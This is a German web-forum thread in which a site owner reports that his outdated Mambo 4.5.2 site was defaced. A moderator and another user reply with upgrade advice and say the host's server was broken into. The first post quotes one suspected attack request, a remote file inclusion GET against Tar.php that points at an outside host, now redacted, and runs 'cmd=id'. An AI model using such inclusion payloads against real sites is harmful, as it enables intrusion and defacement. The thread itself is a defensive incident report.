+ Antworten
Ergebnis 1 bis 3 von 3

Thema: [verschoben] ACHTUNG! Hackerangriff von ISKORPITX

  1. #1
    War schon öfter hier
    Registriert seit
    24.01.2006
    Ort
    Nordkirchen
    Alter
    44
    Beiträge
    182
    Bedankte sich
    57
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Ausrufezeichen [verschoben] ACHTUNG! Hackerangriff von ISKORPITX

    (mambo 4.5.2)

    Wir sind von IS____ITX angegriffen worden.

    ALLE index.php und index.html wurden mit folgendem Quelltext überschrieben.

    Edit, bitte kein Links zu Hackern posten, und der Quelltext hilft hier zur Klärung auch nicht weiter


    Vermutlich gingen die Hacker über die
    PHP-Code:
    GET /includes/Archive/Tar.php?mosConfig_absolute_path=http://www.kein Links zu gehakten Seiten.us/c57?cmd=id HTTP/1.1 
    Wenn ich noch mehr herausgefunden habe, dann werde ich das posten
    Geändert von holmi (26.02.2007 um 10:44 Uhr)

  2. #2
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Ich habe mal die Links usw. raus genommen, wir wollen ja keine Google Werbung für den Typen machen.

    Dein Mambo ist hoffnungslos veraltet, da ist ein Angriff vorprogrammiert.
    Bei Mambo ist 4.5.5 bzw. 4.6.1 aktuell
    http://source.mambo-foundation.org/

    Bei Joomla 1.0.12

    Björn
    Geändert von holmi (26.02.2007 um 10:43 Uhr)
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  3. Erhielt Danksagungen von:


  4. #3
    Kommt häufiger vorbei
    Registriert seit
    13.02.2007
    Ort
    Karlsruhe
    Beiträge
    321
    Bedankte sich
    5
    Erhielt 73 Danksagungen
    in 71 Beiträgen

    Standard

    Dieser Angriff hat (leider) überhaupt nichts mit Lücken in Joomla oder Mambo zu tun. Bei meinem Hoster hat dieser Hacker heute schon zum zweiten mal den gesamten SERVER, also auch Seiten, die nicht mit Joomla arbeiten gehackt. Dabei werden offenbar Sicherheitslücken der Server ausgenutzt.

    Nichts desto trotz macht einen ein veraltetetes System natürlich besonders angreifbar. Meins war leider gerade frisch upgedated :(

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein